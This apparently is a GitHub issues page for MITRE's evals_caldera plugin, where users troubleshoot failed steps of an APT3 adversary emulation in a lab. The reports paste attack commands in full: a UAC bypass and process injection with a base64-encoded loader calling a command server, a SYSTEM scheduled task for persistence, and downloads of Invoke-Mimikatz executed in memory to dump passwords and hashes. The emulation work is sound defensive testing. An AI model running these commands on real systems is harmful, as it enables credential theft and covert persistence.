mitre-attack / evals_caldera

A CALDERA plugin for ATT&CK Evaluations Round 1

License: Apache License 2.0

Python 0.27% PowerShell 99.05% CSS 0.01% JavaScript 0.06% HTML 0.61%


evals_caldera's Issues

Documentation link is broken.

The link in the readme, "Please read the full documentation for this plugin.", is dead.

I have searched through the readthedocs documentation but see nothing about the evals plugin to update the link to.

[Plugin - Phase 16 ] 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083)

Good evening,

This issue goes along with:

because they are from the same setup and operation execution (APT3 - Full)

When I got to 5.B.1 - Access Token Manipulation (T1134), 6.A.1 - Query Registry (T1012), 7.B.1 - Remote File Copy (T1105), 7.C.1 - Scheduled Tasks (T1053), 8.A.1/2 - File and Directory Discovery (T1083) I got the following message:

Import-Module .\StealToken.ps1 -Verbose -Force;StealToken;CreateProcessWithToken -CommandLine 'cmd.exe /c reg query "\\\\FILE001\secrets\hklm\system\currentcontrolset\control\terminal server"';CreateProcessWithToken -CommandLine 'cmd.exe /c schtasks /create /tn "Resume Viewer Update Checker" /tr ".\sandcat.exe http://172.18.39.8:8888 evals" /sc ONLOGON /RU SYSTEM';CreateProcessWithToken -CommandLine 'cmd.exe /c dir /s /b \\FILE001\secrets';CreateProcessWithToken -CommandLine 'cmd.exe /c tree %USERPROFILE%';RevertToSelf;
Payload(s) not available: sandcat.exe

I was a little confused with the "sandcat.exe" binary. It is in C:\users\public\sandcat.exe as shown below:

image

and this is because when I ran the PowerShell command, it downloaded it there:

image

However, I believe the script believes it is on the path where the session is running from? Maybe? However, as you can see below, I ran the PowerShell script from the user pgustavo's default path. I don't know if this makes sense? 😆

image

Does it make sense to update the script and set it to point to C:\users\public\sandcat.exe since it is the default location for when it is downloaded? Or can I just download the payload and run it from wherever I want? You guys have this in the Wiki: "Step 1 began with a legitimate user executing the payload on the victim host." I believe that maybe an additional comment can be added to the Wiki to be very specific on why you need to download it rather than using the other options available in Caldera for initial access? Maybe? Just sharing some thoughts and my initial test 👍. I am so happy the other steps worked perfectly fine and I was able to collect the data generated by each step 😉.

Thank you in advance!

[Plugin - Phase 10 - 3.B.1] Process Discovery (T1057), 3.C.1 - Process Injection (T1055)

Good evening,

This issue goes along with the one here: #1, since it has the same setup and operation execution.

As described in the previous issue, I also had two processes running as administrator (right-clicked on cmd and powershell and ran them as Administrator). I believe since the previous step Phase 9 - 3.A.1 failed as shown here in #1 (bypassUAC), this step could not run properly.

Script: https://github.com/mitre-attack/evals_caldera/blob/08315bfa28df7f6a10db3a9abadba1fdba9b2d96/data/abilities/privilege-escalation/088b8639-3f37-42cc-9dc8-01aabb645461.yml

Output:

Import-Module .\Invoke-PSInject.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Inject -PoshCode $pcode;
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-PSInject.ps1'.
Get-Process : The 'IncludeUserName' parameter requires elevated user rights. Try running the command again 
in a session that has been opened with elevated user rights (that is, Run as Administrator).
At C:\Users\pgustavo\Invoke-PSInject.ps1:3583 char:5
+     Get-Process -IncludeUserName | Where-Object { $_.UserName -like " ...
+     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [Get-Process], InvalidOperationException
    + FullyQualifiedErrorId : IncludeUserNameRequiresElevation,Microsoft.PowerShell.Commands.GetProcessCommand

According to the description of this step:

description: The limited functionality high-integrity RAT will inject malicious code into an existing fully functional high-integrity process, resulting in a new elevated, fully functional high-integrity RAT.

BypassUAC failed first, so it makes sense I guess that this step did not work.

image

One thing to mention too is that the plugin says that the Phase 10 - 3.B.1 step ran successfully. However, as shown above, it did not. A screenshot:

image

Thank you in advance!

[Plugin Phases 14 & 15 ] 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055) - Mimikatz Update

Good evening team,

This issue goes along with:

because they are from the same setup and operation execution (APT3 - Full)

When I got to steps 5.A.1 - Credential Dumping (T1003) & 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055), Mimikatz failed to run.

Script step 5.A.1 : https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/4ef6009d-2d62-4bb4-8de9-0458df2e9567.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function logonpasswords{ Invoke-Mimikatz -Command "privilege::debug sekurlsa::logonpasswords exit"};logonpasswords;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more...

Script step 5.A.2 - Credential Dumping (T1003) using Process Injection (T1055): https://github.com/mitre-attack/evals_caldera/blob/1b3f5ffc882d8f46e689a134137af8138f3a43d0/data/abilities/credential-access/effbedc1-1bc8-4a75-9395-980559700008.yml

Output:

[System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $True };$web = (New-Object System.Net.WebClient);$result = $web.DownloadString("https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1");iex $result;function hashdump{ Invoke-Mimikatz -Command "privilege::debug token::elevate lsadump::sam exit"};hashdump;
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull
 
Cannot find an overload for "GetDelegateForFunctionPointer" and the argument count: "2".
At line:489 char:9
+         $VirtualAlloc = [System.Runtime.InteropServices.Marshal]::Get ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodException
    + FullyQualifiedErrorId : MethodCountCouldNotFindBest
 
Exception calling "GetMethod" with "1" argument(s): "Ambiguous match found."
At line:886 char:9
+         $GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddr ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
    + FullyQualifiedErrorId : AmbiguousMatchException
 
You cannot call a method on a null-valued expression.
At line:893 char:9
+         Write-Output $GetProcAddress.Invoke($null, @([System.Runtime. ...
+         ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : InvalidOperation: (:) [], RuntimeException
    + FullyQualifiedErrorId : InvokeMethodOnNull

and more..

I was doing some reading and also remembered seeing something similar when playing with Empire (master branch). I remember switching to the DEV branch and it worked properly with Win10. Remember I am using The Shire Mordor Environment and my workstations are Win10 and servers are Win 2019. They are all configured to the setup standards from the evals.

I also saw this issue in the Caldera repo which confirmed what I was thinking when I saw those initial error messages: mitre/caldera#38

I confirmed that Mimikatz in Empire Master branch does not have that fix applied. However, DEV branch does have it. I believe the following needs to be updated then:

I can submit a PR too, but I wanted to first check with you guys. I will give it a try with those two fixes soon.

Thank you in advance!

[Plugin - Phase 9 - 3.A.1] Bypass User Account Control (T1088)

Good evening,

First, I wanted to say thank you for all your work on this plugin! 👍

I'm running the APT3 Round1 Day1 scenario in The Shire Mordor Environment, and I got Caldera set up and ready to run the plugin.

Victim: IT001.shire.com
IP: 172.18.39.105
User: pgustavo

I ran sandcat via powershell as shown below

image

I also had two processes running as administrator (right-clicked on cmd and powershell and ran them as Administrator).

I started the operation:

image

And everything was going well until I got to Phase 9 - 3.A.1

image

Step Script: https://github.com/mitre-attack/evals_caldera/blob/master/data/abilities/defensive-evasion/03afada1-1714-408f-bde5-f528b91dc89d.yml

Output:

Import-Module .\Invoke-BypassUACTokenManipulation.ps1 -Verbose -Force;Move-Item -Path .\update.ps1 -Destination $env:APPDATA -Force;$pcode = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes("Import-Module $env:APPDATA\update.ps1;update('http://172.18.39.8:8888')"));Invoke-BypassUACTokenManipulation -Arguments "-nop -exec bypass -EncodedCommand $pcode" -Verbose
VERBOSE: Loading module from path 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Dot-sourcing the script file 'C:\Users\pgustavo\Invoke-BypassUACTokenManipulation.ps1'.
VERBOSE: Enumerating Process list...
VERBOSE: HI Proc found. ID: 3356 684 7440 2668 7724
VERBOSE: [*] Successfully acquired cmd conhost conhost ctfmon powershell handle
VERBOSE: [*] Opened process token
VERBOSE: [*] Duplicated process token
True
VERBOSE: [*] Lowered token mandatory IL
VERBOSE: [*] Created restricted token
VERBOSE: [*] Duplicated restricted token
Requested registry access is not allowed.

Is there anything I can do to troubleshoot this error? I don't have much experience with that script, so I am not sure if it is something I need to do to my box setup to get it to work.

Thank you in advance!

server.py failed to start

Service cannot load evals after adding the evals plugin: load_data() got an unexpected keyword argument "directory". Please help me, thank you.
